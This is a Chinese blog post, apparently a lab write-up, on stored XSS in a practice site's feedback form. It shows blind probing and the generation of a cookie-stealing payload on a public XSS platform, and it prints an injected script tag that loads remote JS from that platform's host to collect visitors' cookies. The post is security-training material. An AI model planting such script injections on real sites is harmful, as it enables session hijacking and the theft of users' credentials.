xss攻击之伪造cookie

本文探讨了XSS攻击中的伪造Cookie问题。通过靶场实例展示了XSS盲打,揭示了存储型XSS漏洞。利用XSS公开平台生成的漏洞利用代码,详细解释了如何插入和执行恶意JS,以窃取访问者信息,包括Cookie。同时,还通过UML图表辅助理解整个攻击流程。
摘要由CSDN通过智能技术生成

靶场地址:

http://59.63.200.79:8004/Feedback.asp在这里插入图片描述

XSS盲打

见框就插,输入进行测试 (若有长度限制则在input框中修改最大长度),点击【提交留言】按钮:
在这里插入图片描述

随后自动跳转到查看留言界面:
在这里插入图片描述

很明显插入的js代码可直接执行,分别执行了这三段代码
在这里插入图片描述

尝试刷新后仍然可执行,由此推断其为存储性XSS
在这里插入图片描述

利用XSS公开平台生成漏洞利用代码

xss公开平台:http://xsspt.com
(亦可自己本地搭建获取受害者cookie的源码)

首先注册登录:
在这里插入图片描述

创建项目:
在这里插入图片描述
在这里插入图片描述

如下是我们刚刚创建项目的项目源代码在这里插入图片描述

以及使用方式:
在这里插入图片描述

在这里,我使用该行代码插入XSS漏洞处:

<script src=http://xsspt.com/ds4vY6></script>

在这里插入图片描述

  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值